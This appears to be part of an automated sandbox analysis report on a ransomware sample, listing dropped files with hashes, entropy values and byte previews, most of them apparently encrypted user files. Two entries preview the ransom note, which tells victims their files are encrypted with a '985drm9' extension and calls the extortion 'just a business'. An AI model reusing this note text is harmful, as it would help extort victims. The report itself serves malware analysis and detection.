                            Encrypted:false
                            SSDEEP:24:WMFKFNdUk/Dbr7J4nXxIuHXr7f4sqWSWAyilGiQacmLe4wo:WMFIN5/DbnJgOuHXr7fFtSnlhQ6z
                            MD5:4B2AE27B23AC581B920E16B9D9AD3781
                            SHA1:FBADDFE89C288139FF1F56AC19F8FFC94D1F20EC
                            SHA-256:6F4ACAF015BF4AF4EB4B1080FCBAFD3472FD63B11A7FDBA85CD9531EFEB99D29
                            SHA-512:0A6ED5430759570A68C2F9D12A2BAE3F82440834FC0470A7CE1F86FA4A12589A21576782CAD7C95ADAEDB0F831603480EEAE9B88E26AE23ABF970DAF7BD84F7D
                            Malicious:false
                            Preview:..Y.....F......('M....4.s..4..$.Y...w..p....=...1:W$.c'.e/.O...L=/..k.(#.}.6..;y..C.-..}......z.M.z...Y..15.)..-.B..=b..*n....M...2....i....<.Ca.:..'E2.<e.X../.2+.OX..........T.TN...MC~.....w9..].1.B....\..(..Z.D.....j,..........JD3.._.......U...p..S.S.u.t...^.U.9.`O.9.1<..@...hT.l..Uy^3.....A...'^....>...yW.%].3g....R@....."....H...J...;...B.. .a.F.r.DK`...Z..?.kH...K....<5+}.........W..&..G....XO.f........lbT:c...Cvp.q.*..!.O0.V.w..}....(.@. ...g.f...h.........i.O94y.2.@&Y..gO.VP.....6...`E...E.+s.K....2C..'7T.*.r...W.kPR.<.....v.IS[...t3...V..Yb.%.T...m..0..v..!.w!....',....W...SM.Fx.u.t>..F.U8hCW...(yy.[U..[...^?....Ln..a2e.}.?....`c.X..,..}..~ .. .v.....QF.)S..._UO.R).........k.z...L9....yid..AV..;..W.H...@.II.... ..F.)..,W...*..n}'.{;..x....VD4d.rsH'!..Cw.]...Y.+..../V...X..?(....".......c..ho.^...{.AD1f.C.5+.zy.y..{...53..=G.o.vD..2Ck..2.O..y.S.Zm1kw.....~Q.X..?....&`.G...o;.E.dU. 3xa.............../.....$.,....'l......?.}v.H.rZ.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.82858918846522
                            Encrypted:false
                            SSDEEP:24:bQB9xKSrnsSLugUNsk5gF6SCbCvhl3y3LP78PNY9rT6WDWFllGiQacmzPW:bQ3y54xSzIPa9rRDYllhQ6zO
                            MD5:D6AF377F116B1ABBB697AE8AE7B6CBB7
                            SHA1:B5502BE27DFFD3D0FCA306A39D4CF7BA0F2152B0
                            SHA-256:E1E6DF8FC2890C675B8B893F54025C8F848B14D04E5A4F2429BABCE24DAD3C48
                            SHA-512:BDBDA7D52234F8FAECA8266A87A7CCA29C90EF9AB0D4C0EC33CD036A0ACB5A5B25F7CDB93341C69461DA0D071F210C9DAE7622359BF5A03786E9A52B577EDF36
                            Malicious:false
                            Preview:.s....\.R...9..O..p.=.j.*G.P..k..t.B... Jn..;....!.......)..kTC.C.f..g.a8.@[....=......>BK=.n...)t..@.....8.!s..c.............*.xN..h*..o..G.....8..^.V.BA,..LQ.PB.._.)..L.s...u..:.....K[w.}..{..B=o....w.4G......+!....Q.c.\.(.N.@ ....n.e5.v..>3_.b.|..+..Rc..p.5}.....0~,.........P2J<.(_N..q.Ht.....f..9.|&..,.....}.6..~.3...m.V.4o..."..Q|.Q....y..l.G.O>..l.).`G..r..b.....bW.G...?f^K97)..I:.%..O......l.)..|M.g.2i.n. .<WH.O......K..\...X.....G..4eo...{P.....^.uu.k=.e..~80c..[..uB1......mCJ..t%.r.j..\Z..../+.....=..s......G.l..K.y(...0..3.TXV77RG...-YG..L...h.#?...eQ.@LY....bLU....^.f.j..u.N.j....U..o..^....^..&.n<..T...KX...0.x..)...z3.W.}2w.t.t......0.0"....#.?Q.....5.J..$..~Cp.V(....rPW..r..J....i.......G.^._.i=.0..Y..S.;....t.R..K?9...(e...&.h.g"}1..AC.,.e\Oa.O..T.&TK.l....R...Y....."7).`..w1.......]b.+j..&G_}>h)1{H..;.........{..zU;..O....f...v.2.1.v.L....3.$......K.c2z..a.n......+rD..+...c...7&.>..l.O.IH...2/...N7a......L...*...K.>....K.r
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:true
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.844432774570313
                            Encrypted:false
                            SSDEEP:24:8nPr9N0v3Kon4UjC4mArlBbftuW9KvBJG0VZCzHzPo4lGiQacm03/K:8Pr9N0iow4Jrl5ftteBl7Mro4lhQ6Wy
                            MD5:AF3F5DDA9081E7E86AC26C48D2AC0CBE
                            SHA1:8F639ADBA1D35D3C003A707D284BE5D8C4F6E833
                            SHA-256:8BDC1F9C5D80E0E7B68EC433635D1C37471048CBFC0698A9254DB246111E93C8
                            SHA-512:26A002557B3246211636E2FB4122EFE1A9D07EAE38EF900FA3AF85BE27B01B15C5BCA2642F69748795A99E8C2FC7DBDE565F56340F37B1F81E17B2D7FC6622E1
                            Malicious:false
                            Preview:z.;A)....a..%.@.....=.X..&.w.:mvi.|jz#.F..A...?..+.x...Z.0 ..y.<.../.o..%..+..lC%#...M.....m.D..;..m.d....':L.ys...H4{....Fp.._.l.......N:LR<.C.7[......(F#9..#z.B....{u'#.2.+..........m.d{.U.:\..x..2<...q#)..........(UQt.s.=.t.X..9...<.I....F..W&..H+$..Fj.....BE?....7..VP{/h\..V.l.7.L..]f.e.O...,....h;.V.T.8..Qgh.5.I....0q9...\\..V.q.~...........=Y.EY...[.8e^2......i...h......r2H.E.f...p......K....^....S_"8c.(=.....c..r.y?j/...4...Vu.......?e......E.s_..aW5.D.P...Vi..r`xGHz/[..e2..`.#.3.n.04&..<...)....._...k....!.7AH.A.=./..8.[.g...G......0..y.........?.a....(......,.j..p"}LPfD.h. fW#..L"R...Nc..f..*.. ....&..m...6.dCod[eVF.\v<Zm(..A..6.'<..8...krj..~N.0.)=o.!....MZ......:..G.+..........o{].V..E].p....[..6.z..f.......@I8=...k.l1n"...&.v.$.O..4.....'.}....@0.u,. .7G.'..vU....h....F..*..^.<....4.....d....k|.y.}...s.~..!...W.QP...l,...h.*r.NT.%.^....H.j:...C.j..{...".....!..,.l)...p}J.>..iJb3...R..h..^....c..@.<.....?'..oB.......l2._..C.g.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.8429173016329745
                            Encrypted:false
                            SSDEEP:24:MvEMDm+eH1YCNxFhn5Esb4uVOWjL/W9m3FCUP5vAK/+CXW7YQ4WpilGiQacmzw:MvEMm1XhTb7cWH/am3ZIO+CG7WWpilha
                            MD5:EC17C6C9A6517D97A386B522403B67DB
                            SHA1:A3B01966782E8B2DA38101C24A9F257124B0D29C
                            SHA-256:0DAB25B857D21B12E9DBE91796019AD15E23272E7CC27097E076A6308CF03E75
                            SHA-512:C04F5CFF5231D94B713F4890E8F6286983E4F46B22838F2629813F941C97DC5297FFBDC81829E31125D10CE76200515523BB172E5857BD5E7CB8251120650590
                            Malicious:false
                            Preview:.,a...[.{.....z...h6[./k`.~.0.5..9..Se.n....@T..2(....zN.ON.=+..s6)2>l...\w.vwv.H....E..U./X......p0.J.S ...o...!..Cp.?pG...(..w3:a..u.v.c....&........[..9.oJ..`{...k..o...,....*..B./.Ka ..[.9...P.9G..].z...nt......r".o.K..#m..t}....)....`x...l.h...?7H.#...v6s..o..3Uh.a...$...).a..}yqK.cpJr..^...d..EG..j..\......."h~.......9....@r........E.=.....K.UZ..3......O........?.H..-3...FH....gf.;...,...k...q`..E..f#L.O8.h9.y.....5.wn._.O.ub.1..0.{...ixN...+"...(a....iZ9.#g....\.rX.......z>4nm.,R..\..J.uMT.6.6...^u.}.....L.!......J.tj.Y.....u..K.^.q.y.o..fs...&...`YX....5....d.R.ZA..glup.[......q...)\..{.(. p.....0...3.d T..j.....Z.?R.3}.6..J.T.1..'..f-.v...>.jkQ-_.).k...-...^n.D..9...?..wi...[4....s...)B#N..]...(W....+\...(....Sw.h...p.....>m..t~/..5.....H.`.E...4.~.E...f_...K.?\x..4.V.."...$..[.L..'8w.%#..7.#...e..<.q.z..r..D......(.M..l.3.D.:....CQ^"g.....je..m.P6..C.K...:^Ah.....6Yt......rYq0;.....R.vu4."9b.R.@.A.s$E.|.'}..q..#...[X.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.843481502916022
                            Encrypted:false
                            SSDEEP:24:SqxdeMMbRczGUg2yPyY75a7NLphkdWMZlKx/DTlGiQacmSeaK/:THeM2K7g2yPyma7NFhPCG3lhQ67/
                            MD5:50BD6CEEF987B0C22EA83117FEAA94CE
                            SHA1:44561E30C4021334E953D2DB40DD897455F39346
                            SHA-256:1D04F43DD4EF3EE0457365A1503E1256AFD3B34FAC00988A5E11642F55E200C7
                            SHA-512:FCCF2605009CF3025B487CBD51099ECFC3A8A316A6449C1F0FC38CAEBB3F314D5E5A33B87BE665A58639FE429B4FBD50E412E94E38C503F6119B297C55DEFBBC
                            Malicious:false
                            Preview:R9\c.>....x.H]...@..+.T;..TP.N....KZ..T..~./...4K ...U.5.l...cI..=.E.u.............H.c.....H..KV..... .~1.K...@^>.v.+..T.po....}..%..is.@0.7.2g..+S.._.z.;..2..Xy.2.z.'Z..my...............T..E...'..4.,IZ..g+..T d.s.2....7...1w........../(V.......7.F..V... .4;..S..)T\..[@..}+.'..4XU6...MDG s..*...U....4..).aX..vu3..DYr....U.s6..6v./.,.pJ._2 M.#E..U..;4P.0.G.V;...v......1...f.......D.,..D.>1...g..).M..........*9..<.W\...Ow&d:..J......!.pi..SU..*9..;4......D..'K7...N|.}.......&.....C.6.VJ..`..&.QB..D..., ...'Ic!......z.m....s.......9....>.U).YH.Z...........r...x..!D..-C......L........e..m...Y.....`..7l.8=.ZZ....>o.tk...........i..1...pq..V9..m9w9_.....LI.E.j.vJo....).....Mo7P..d.9..0..bMNhw/D...@'!.C..=7"........n.y..,&D.e.../...%z.!...3.z..A.v.............I.......w...{@....M....w.kw.B.^..b..s..L.....t....RLo..R.&.k=..L:.cq.......QN............];.#$.d.f.....0..{..7...a.o.6.B..*.(2..P..;...........ymb2........z.).a.H.....*.. ...&.Z..{..3.../#.>.G.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.850161112838322
                            Encrypted:false
                            SSDEEP:24:PXCvOZWnK2wPze9mzTek2bZi+BCR/euW1cNj2LUBhw5ZPylGiQacmKs:K1gPi9mPek4tB0zmcNFKlylhQ6n
                            MD5:776ABF60E2800D0415705CF540A61AB3
                            SHA1:48AEAD9532A8A9367100CBD749AAE0F170525C67
                            SHA-256:5632108ADF987AADA8AD3C0FBDB6C76C7CBC9C2E53E6EC6ED03959145397C528
                            SHA-512:5DD50E71C6D6086417804309349AA8D609A028BDF899F10595CF88E413E26F4C89DCEBAFE724B28D742F953480171F65A03DD5BFED820ACF122F4DFAA2E98C44
                            Malicious:false
                            Preview:..w.+{.......".......z...#.[A..>.........r.gk.Px........|..I.B.6^l...Q&...`....A..N...@.{.._.v.:|.o|...;.B. ...sN......9.J..[.1=D....>..V..R.B?..z..b.....\M.b.<.0..5...%.E..;..;...m..l...Y.{.xj....q..j..V.?.S....`.F4..)...X......j.I..a...b......+.i.'...9...........#.I).d..).`...!.J.o........p....cF......'..i".<.fu..A..N....+.5"....;B..j?..d2...my.P..k..A..WFl6...]X&.@-..zw.=......{e,.t...r.~....D...pF......(.3+A......#....B..d...T.n.yk. .2.j.0..D.D`.V).b....F...........t...)...<..5...\..@. ....F..-3.....1+o\..~Vp.|W.a.~.=.YD...cl..=?....>.../R..... ....-..LWP8=....&...l.......]......|L1....&..1P.(@..+L....~.-..S@.".......1.6RG.....Gs.Lg`.H.tqC.%..z......6...r.T".onV. .A...|.".2....bP.5.9LOU.....O....(g...Q...A*...L.Nb".....l{+.o..S/..%._..c..(C2.!....4..d#...%...........6D..52n.h.p.\.;.I.$....&.*..sN0...K..8....m.K.....=?...[.xf.{.hG........xGo^30^.._[..B%.Z..?Lo.m........R[.l....xm'6P.BW.."...K_...L.D..y..X..>..!...h...\r.....-.qw.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.849703039923315
                            Encrypted:false
                            SSDEEP:24:UgwV2cWETtzwZy+p6msopdrAizBrcbfC1f/4e0OxTfQlGiQacmk8L9n:Uj0JEFCuMd0izpU8fL0afQlhQ6k8L9
                            MD5:E1995F22DFFB5CA32E3EF2FB460C8360
                            SHA1:F34276A67B0188168BBAF4EC0410BAA257229855
                            SHA-256:AF58093A8D40E73D235DF9337632C3CE5D574C4FAF37E66DBDBFD0DCFC21FAE6
                            SHA-512:778F12763D247A80C34B0786AAE429D9F7C78C6FB3A0EAC281EB0179E5B464424DAFDDA3FCAC3BF8994DBC248D477851B8E5690AC6A8485556BECE86BED9707D
                            Malicious:false
                            Preview:^l.....b ..."....."...=$E.>3K.%.A.......SuI....f.\i......."..[.k...._.<....)....9..Y...1q;1...S.....:..2.}..#.B}..x.{..\...:.w.zE..p....96...bRG...b..j....f0.pH.....I-.....y..;.......E........r.}.#O.....V..4{.r&..W.m.gU5.L_.Zs=....W.D->..=M.(....`f.I..Y..$.A...h.q4-k..l.wj.x...jD.+..0W.P@...4......g...V......3oq. .V..,u.,.@H..,..o-E..W....Z..'Ox..G]L...>.HZ...#G...MG?..3.`...D.>dd_.>..9..&.twa.i.8............w{5.3........q...x;..l.S...!0 .X.....g^s.8.P.`......C.?,..u#.?W..a.0..QCK..j|... Kp...FT?.C.A.~F..aK..!}.%\{RyO8.X:....wcO...|{....K..3:#.-J...h..k...8'...f-D.0.5yB.U>.Q-.'..=.p.#..x....I...yI...Q..y.CT...u.0.3...l.R.F:..I...<._..@..Aq..0....i=.w...0......9..P.p_.AVD..sd..ER..f........z.j..c9..0o.U)t.%.Z..R....e.>)@......k>%.......hRk.4....q..ixx.%..n_....)G.&.l....M..^k....C..'U.V.8..{......Xah ...|......,...kD.=`dT3..#...EU....,....&..odZ.7.....,Y.9.lP...<.On_H....S..l._.ns..(H....?..L.Y.4..f..cS.....3.4..E8....X..j..`..F...s...
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.843307131484526
                            Encrypted:false
                            SSDEEP:24:Pfdv3BOU5gFfHQzHLD6nA5dxv8Zj+ZC1Qw0NG5lGiQacmUt+3UNn:Pfdv3BxCFfHEHLD6nA5dxkZjT005lhQH
                            MD5:25A53089BFED3C988DB7698A0D5E3E28
                            SHA1:1C4D1AC389B109468EEAEE0ACEF2659932BFEEFA
                            SHA-256:18E1466D90BC01854424506EF57E0A06BBCAB82040B81FAAB9C0A4C7CD41AD7B
                            SHA-512:776BA83083052F1E81DB333E1D565517D68F5EF9D0C7312096E938E1496EBF60E8526178D5D7C35D1C86F6BD020A3F70D706CD0633235B1D8D4BC968D4E493D5
                            Malicious:false
                            Preview:w....~..z...{...f,!".....[.;..#.L.0x.w{......`.%OhZ$....9.-46... =.".F..{..]E.;r.@.J..Zb}..U.]jq...];9....A].TRc.....d.=.t.w...{.....<G..Df........l..$...y..e.Ws..Ynn.=....R....{..+.w.>.EI.2..S......v.......i.a-...y.1.d.}.r.i'tz...!..wi.T..U.:...8.K.?g.C.K...,~.....*.:w..Lg.i........;.S..Y!......#...V.....rbr.m..+...m.5.2.[R......;....,..d..\[w...}..I......v..v.`_..J..Ay..D.=..o.Y{...]..&...".o...&..y!......P......V......U....J.k.<.Q.g.I47.;7?..."..D@..Y..B..i.....S@...#.......%..U...m.......eb.`.+.Ih...U.8.-...SON.TR..v...Ry.%.iG4...7.1..!...P.v..Mc...y.G....[)..J.....~.#.F...~c...S..l.K...i...(.w\./..*....{......w.e...i.....P....!...lI.&)Zq".h9...h.%.[>.x.uSCu.i.l.VG....?.p..d.d.0.......1B..l...mRK;.?...P....gs-Wu1VM.z..1$IN.u..r..H..J.s.....4S.....&. >.......Q....=.>O.nH3.....&.g}...>(.S..J.mX....!......P....*....~z..g"w..;.k,.3.Mm.t.>..Z.W1d..G/...........z..H<....23.V.8.2/..}...`.j.2.#....9.g..o........1tb`X~{.4l....X.j.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.83661727409692
                            Encrypted:false
                            SSDEEP:24:tVIv6TZN68/Hs7n3BeLc4vUA1oHqtU+fh/oujtXUInMppxlGiQacmtdWd:5N9+x4vUA1oK//nLM5lhQ67Wd
                            MD5:297F29FB9BD66A47DBB4CE1DC79E3841
                            SHA1:036AE75C3294DF5FA4EBB610B5365295C1BBC0EC
                            SHA-256:52909652DC846814E57D3D77AD7152B59D1FC93AC28BD02B0DAF7944FAA392D6
                            SHA-512:5A31E749BBE5E66D5A6B7E389F56D32AFB6F03070901C05AE0EAC1AFFFE2EA777E8FBAB3D5933AD2543FCD9E9F467CD1B494D31DF6945EA86116F603E8C92096
                            Malicious:false
                            Preview:n...-A.e.+`m....... ..`k.dYY..#..+.J0...}..1H..\[.f4....&z[.]T.+..}..d@..._.UQ.l......M..q.....Ua{R..>?..#{=7..@..h/..Q...3.@d..e.....(.8..r.....V..'.Eb...@/.B..?fO.a.Xe....2.x....M....,...[G.k.a..<-u..e.4..87....G.,..,..v.Rx.x...Tb...m.r..@#-.....MK......oX..9.Q. h...Q...EN..q.<>.Z.ko...^.S.&n.X.N).PR...|.....A...E.....H...Xf0..IQS..1...K#yq<.......:.)...>I.".w...}.y.'..#wH..H(.&XT..G..\"......(.\.e&...v.1...U.ns........^. .'H..m.'..Y......<.!.R.K1d..w...a.....j.A..1u.s....m,k,..T..Y....!LQ..,....Z........u.s....;.>>..X.<..^.C#......)6U....J.......Htf..f...?.C...Q....ckZ.:t/N..B.kE*F...F.wm..c......v....O...x_h.18&...[U....@..i.]M..Q`.4(h..3...E...@8....4.....n....S..^...7.....w!....Z!....wp.s...^....(...r..yK*....P....!..x. .6...F..P.m......(.3...2=.=|a7..r.z ...f.......8..........@..eF.q.P^*....p......E....l..".3.g..C<...............F.r...f!u...T..^.4. .....H.@<.Wt...;..4C..H..9u..N.T$....uQ..{.L..M...{......oVt.,.w..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.843507840020277
                            Encrypted:false
                            SSDEEP:24:HqMaFWuYqXY7L+n0tKadm03NFnkbODUVXHDcRlDOjo3O/OylGiQacmhS:KrWuIPxKkN1D42DOX/RlhQ6Q
                            MD5:E49103AF34054478D66BB2A79CCA3FBA
                            SHA1:956EA1CC813A7A3986874B9549273FAC93FB5CC5
                            SHA-256:4C7F8E8F823B68B5BE8ECED59F98DEF4EB7BFA162E326943106806906196BAEC
                            SHA-512:C3EA4FE1CB9CA226C982AEA5A3B63F5B70579868D31FD32642ABA6A8528A93E7500740E383E969DEB6A775E7D35BF8A4A8E58AA47C912AA17212D51639FC5890
                            Malicious:false
                            Preview:@T._<<.jc..Z*.:$j../..TU..B(......O....M..;4....i.N.P.._-{d....<.sQ...K*.)..e.mO...f...b...#.3a.f.....A...\....!./..@..u.F.......m...IJI|m]........T...o.[....:c:".K7T....Q/;=Zi.^...m.1c.i...... ..|[.e...+..7!tw......uO.[w..4ea%OK`.o..m.....;P....i..1U.........v...M..==qv...{.X....,...\e:.s.'~...i.n..BGb.}G.4.sa...C......<l....7.....\...d../r.K./h........M......kc1.....jz....B..0.g..!b4c..}$..6.$?.,..ls......`....Rf......=cD.v+.......}...D.k........ ..Se|3]..P.....M....r.Ss..vp&...g...K...z.v...>.(.t.......k.{n:..`o<..A.a..../...W..S^..K..4h..e...z...w.AH....R.....GR....8aa..@..k..c.....UB....f.........,.kgR..=q|..Na..9WoYV.Z..d?.J@.a..0....~...W......p.F....h..F`.(0z...Y...b..w.....?.L.. ...M.[.O.........P..e....S...W.. .ah9.C...+Sh.......@-[Q.....+_..i.V.....+tXS...a'..\.[..VE.K.+..S..b.xJfM|K..T*....q.....T.a.K.....,..g...n...j7..'.._.2.....).s.fcZ.y_........m.a.{g.{........L....yT........T.F..4;..._.....G.......%....x~03.P.O.xTH
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:DOS executable (COM)
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.819396290159916
                            Encrypted:false
                            SSDEEP:24:7b6BXY/CYjbbu3iirgJi/upZBx0n2QtQmymLRQ7lGiQacmWb:7b6l2uyirgRXWQm11Q7lhQ6Wb
                            MD5:CCC0E7D23AE7AF36CD7C83790FFE1534
                            SHA1:401D7A0A9F51ADAA8EF4687D82A4F4A50C033B7D
                            SHA-256:7A8F3551D1A6D1868303D2A6A39094AB5E66F8EA8267ACB7753A498CF3773E68
                            SHA-512:6C135EE2D2DCDB2B3775000B02094B8BD7FAA70DEE6078E3FB2AB16E98E7C9F88B517985C444C16CF712DFF4983D1971C03EBDDD6A4F79CC3FE112DEECBA948D
                            Malicious:false
                            Preview:.^.....M.]c>t}v....H...m....@.T3...=!.P.....#uw_.\..8..9.^...n.Sl..N3F.pa..2..+JX...+...q...I..Y...h....M.........C<.uRl.><....'..j+.e.[...!...;.^...~nh..CFO..P...~.j...4...*..G.S".\...g.'...Q.p.o..'I....].1...E J".G}.......x............y..O.|.}.S.~(.\......*...x...u@........W...............fe.G..jU^.*...P..y.~W.. 7.D.3.....j....N....]r...V.....\.....k.....vC..g.>/..!..'....4,L..8p.~...X.>...$8..{[........9.J.8.^..Q}$|.gVt.".UXV..*.....#..?..l.4<%..$..4/4..V.j.W..........,8.-Q.kw..f..~...iOhp}....c'..S1SJ..}.... ...K...$..^o.....]..Fx.qt.. 9.<...ED...........~N.......gh!h..K.@6.D....Bj..d......M.Zl.L.....N.H..I.-......n:[....)P..8..<*..z.|...q...j7.^......X.|n...>.7...8...F....O.[.7.*.JC..].9.. ....&.m.o.H...a.|y.r..eB.`..<.l.....@Zy..5"...D.... ..D....=3...|>.]..w...X...5...}[f..2.NN..M...lh.?Q...74%.5s\.n."q.!.6.Q.....j.AR.. .n..&K..........?uMjZ.G..b.$g..@...K....R.t..y..=Z.y.A.G.`..n(..t.t?.J...v...V1...B[..........k.U....F..".8#...~.u.{
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.8375034948021085
                            Encrypted:false
                            SSDEEP:24:mBAKWgld/1j7DHIJbHyNNvj5W7gmDH1IoHOPALPqs2XY/lGiQacm8iP:mBAKrlj/02LQfH1I6JLv2XY/lhQ6V
                            MD5:8F14F1219EC83C5AFB2D295194A9BFE5
                            SHA1:42128AE0D7CA2DDDBF5AFAD7515042C9D8801F87
                            SHA-256:D252905CCE11B88521DBB177AB96AAEAD26C207C762904927ACB53E251B8B117
                            SHA-512:7BE021A877C5FBC82C959661C7B78C114F27912EAA7772CAA5BE1A11A86FA95CAB1DBBA24132107FB68E3C159AFB8F231E596A61F3D35FB3F54211C0BB1C3E23
                            Malicious:false
                            Preview:^$...Q...Ga.r|..j...6.g..;.w....$.....|.:.Z.....2.]_...Yd&.Yik...H../J...d..[.........^...U.Q..8...){iu.....'........y.-...y.O.'3.v........".M.J.,...y6....|..n.*x........'..:m.zh...\....#.ePe.n.M.....C.;H...7_x.M.k.k..I.8..\......g~y.Auh$..ff....O...2......`%...dE....)X...._......\..8%....R.*...."..)....)..oV.m./JH. .^(.gi3$...L....Zk.X.M\J...H..ft.h...'...A...8t.)]8j...a.r._R.A.:.C.Z..`I.-....0....5>......_N..Wf.;...y.#..e... ..r.!...j{......%1g.KD.k.#Q...xy.;.S.}...._.?.dw,t..{5{f..Ph&[.P.].~N.O:k....7..{......+..51`.h..c..rn....m<....C.....x......a~;....0.%.c..l.h....5..qh..*...i...h/.>.b!.,''m...4w...w.._........C...DI(5Pi.:$2..q..T..J$.;|.:9..b.......#.L..e.]F.._.gt..?....v....8.t....l..>...'.uH.;..*...........w....T.f..K....../..<.8.:.g..%.`.....PP.0Y.......H...........T.wc..N.. .I..<.j...O.~...a<...,M.p).....uN.m?..\..H...*...=2..d.'z.u.7.(..9F.........6..#.4$7.4@....L....Z.m..t.G.....U..n...X....I...z...0....H...d.9.oJ..q....I..(.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
